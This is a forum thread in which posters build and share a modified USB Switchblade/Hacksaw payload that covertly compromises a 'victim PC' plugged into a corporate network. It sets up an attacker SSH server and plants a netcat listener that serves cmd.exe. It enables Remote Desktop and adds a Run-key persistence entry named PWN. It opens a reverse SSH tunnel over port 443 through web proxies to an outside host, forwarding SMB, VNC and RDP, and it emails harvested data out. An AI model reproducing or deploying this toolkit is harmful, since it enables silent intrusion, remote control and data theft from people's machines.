greypwny

I think there are enough guides out there that encapsulate what you are trying to do. Why don't you errr, ummm use your noodle and work it out, we all had to!

Well finally i have had some time to put this together, below is a zip file of my U3custom folder. http://www.box.net/shared/6bm6ruod1d Now before this will work you need to configure a couple of things First things first you need to create a ssh account etc on your "server" the following instructions are HOW TO for OpenSSH public key authentication 1) Create a RSA ssh key pair with an empty pass phrase $ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/someuser/.ssh/id_rsa): /home/someuser/.ssh/secuser_id_rsa Enter passphrase (empty for no passphrase): [enter] Enter same passphrase again: [enter] Your identification has been saved in /home/someuser/.ssh/secuser_id_rsa. Your public key has been saved in /home/someuser/.ssh/secuser_id_rsa.pub. The key fingerprint is: 8d:ef:b0:0f:9e:b5:cb:bd:4d:e3:12:da:a6:dc:3a:84 user@host $ cat /home/someuser/.ssh/secuser_id_rsa Note: This is the ssh private key you just created. This is the key that gets saved on the USB drive. $ cat /home/someuser/.ssh/secuser_id_rsa.pub Note: This is the ssh public key you just created. Copy this for step 3 later. 2) Create a user on the system that you want the victim PC to login to. $sudo useradd [uSERNAME] -c "Hacksaw test user" -d /home/[uSERNAME] -m Note: For the newbies replace the [uSERNAME] with an actual username like HACKSAW or something like that 3) Setup ssh public key auth for this user $ sudo su - [uSERNAME] -c 'mkdir ~/.ssh' $ sudo su - [uSERNAME] -c 'chmod 755 ~/.ssh' $ sudo su - [uSERNAME] -c 'cat > ~/.ssh/authorized_keys2' [paste your public key from step 1] [CTRL-D] $ sudo su - [uSERNAME] -c 'chmod 600 ~/.ssh/authorized_keys2' 4) Test it out $ ssh -l secuser -i /home/someuser/.ssh/secuser_id_rsa localhost 8<--snip usual login guff $ id uid=1001(secuser) gid=1002(secuser) groups=1002(secuser) Note: /home/someuser/.ssh/secuser_id_rsa is the path and filename for the private key you created in step 1. Note: If this fails for any reason, re-run the ssh command with “-vvv” for very very verbose output and look for the reason it fails. 5) Create a limited shell for this user to stop people using it for bad things, scp, etc. Create a shell file with the following in it using which ever text editor you like, call it hacksawshell.sh and save it to /usr/local/bin/ #!/bin/bash while [ 1 ]; do echo Greetings sleep 60 done [CTRL-D] $ sudo chmod 755 /usr/local/bin/hacksawshell.sh $ sudo chsh -s /usr/local/bin/hacksawshell.sh [uSERNAME] Note: make sure you test this, and make sure the [username] cannot get a normal shell, or use scp/sftp/etc. $ssh -l [username] -i /home/[usernaccount]/.ssh/[username]_id_rsa localhost Last login: Thu Oct 26 16:46:33 2007 from localhost Greetings So now you have setup the server and hopefully by the time you have done this the file mentioned above has downloaded. 6) Unzip the file on your machine and move the contents to your u3custome folder if you haven't already read the above, this is all based on the GONZOR switch blade go to http://www.users.on.net/~simmo_89/switchblade/Index.html to download his original files and replace his u3custom folder with mine 7) Now it is time to edit a couple of files Edit the the go.bat found in the u3customsystemsrcssh folder Now in the last line put in the details of your ssh server Copy those details you have added and put it in go2.bat and go3.bat found in the aforementioned folder edit u3customsystemsrcsshssh_config file and the proxy details to be used 8 ) Adding your ssh private key In the u3customsystemsrcssh there is a file called ssh.key please copy your private key created in step one into this folder 9) Sendmail options I know there is gui that was created for this but i found it didn't do some of the things I wanted to do so yet again edit u3customsystemsend.bat add your mailserver (smtp) and of course the port number this in the line that begins with "for" And please set the variables for emailfrom, emailto, password etc 10) and we are almost done I have also updated the antidote file that will hopefully kill and remove things, yet again this is built on GONZOR's. http://www.box.net/shared/46rrt9plir 11) Create the key Run the isocreate.cmd as per the GONZOR instructions and then of course the Universal_customizer.exe file Once this is done open the executable SBCONFIG-Vxxxx.exe and make sure all items are checked. Save your config and your done. I hope i haven't missed any steps in putting this together and if I have then please let me know. Things to note This does not grab the settings from the user regarding the proxy details this is something (as per step 7) I'm still working on and I' hope you can help me out. As mentioned not sure what is the best way to go whether i need to run a proxycfg -u command and grab those details and add it to the ssh_config file. Thoughts and ideas welcome. Remember it is rude not to share :)

We created a limited shell for this user to stop people using it for bad things, scp, etc. #!/bin/bash while [ 1 ]; do echo Greetings sleep 60 done This seemed to be enough to keep the session alive. Is it your proxy that is terminating the session? I'm having some trouble in finding a site to upload the zip of my u3custom to. Does anyone have some hosting to allow me to do this or a recommendation of where to host said file?

I will post it shortly as I need to make sure there is nothing in there that ties it back to me personally :? Should be up in the next day or so.

With all the talk that has been going on of late on hxxp: wiki. hak5. org/wiki//USB_Switchblade. I decided to put one together based on the GonZor SwitchBlade but with a couple of modifications. This device was to be used/tested in a corporate environment which used authenticated web proxies and there were some unathenticated proxies and with no access to external smtp servers. So using things like VNC and net cat would be useless unless the attacker were sitting on the same network. The other problem was the user had personal firewalls enabled. So we needed to devise a plan where all bindings for networks were made to localhost. Communications could only be established if: * we could find and connect to an unauthenticated proxy * outgoing port would need to be 443 * the traffic would need to be encrypted * locate an internal smtp server for the hacksaw component Solutions * A wget on the proxy. pac file and search for the word Unauthenticated and an regex that looked like an (WORK IN PROGRESS) * netcat running in listen mode * an SSH server listening on port 443 with a username that can only connect to a chrooted jail or at worst to a restricted shell * the ssh certificate already on the USB key * a piece of software called connect. exe to facilitate the connect method * openssh on the usb key This worked to punch a undetected hole out to real world and with an effective reverse ssh session we now have access to netcat for shell commands, VNC and RDESKTOP to take control of the machine and attempting to map smb ports to higher ports for network connectivity. Below is an extract from my go. bat file that facilitates this REM - go. bat ssh file @echo on cd SystemSRC >NUL REM . nircmd. exe execmd . nc -L -p 52323 -d -e cmd. exe REM netcat running in listen mode on port 52323 running from USB key not good for the "thumb suck method" md "%systemroot%ssh" REM create directory for SSH xcopy ". ssh*. *" "%systemroot%"ssh /c /e /y REM copy ssh components (cut down from openssh) cd md c:bin REM this needs to be made dynamic but hey I'm lazy xcopy "bin*. *" "c:bin" /c /e /y REM copy bin components of SSH (probably a better way to do this but hey it works) c: cd "%systemroot%ssh" nircmd. exe execmd nc -L -p 52323 -d -e cmd. exe REM Netcat running in listen mode from the computer rather then the usb key REG ADD "HKEY_LOCAL_MACHINEsystemcurrentcontrolsetcontrolterminal server /f /v fDenyTSConnections /t REG_DWORD /d 0" / f REM Enable remote desktop REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /f /v PWN /t REG_SZ /d "%systemroot%sshssh. lnk" /f REM enable this process to begin on startup ssh -F ssh_config hacksaw@domain. com:443 -i ssh. key -R 52323:localhost:52323 -R 5900:localhost:5900 -R 5800:localhost:5800 -R 52324:localhost:445 -R 3389:localhost:3389 -vvv -C REM SSH session to the server Extract from the config file # This is ssh client systemwide configuration file. This file provides # defaults for users, and the values can be changed in per-user configuration # files or on the command line. StrictHostKeyChecking no ProxyCommand "c:windowssshconnect. exe" -H IPADDRESS:PORT %h %p #using the connect method to get out to the web This process doesn't require the user to be a local administrator and will run every time the user starts the system. Even if they are on a non split tunnel VPN connection. There are still a couple of steps to work out how to do. I still haven't had time to write the script that gets the IP of the unauthenticated proxy, or how to bind with outlook or other email client to send the results of the hacksaw to an email address. Thoughts on the proxy are run proxycfg -u from command prompt if there is a pac file found do a wget and then search for the words unauthenticated then grep on the IP address and set as variable. Please offer comments or post questions to help with this approach.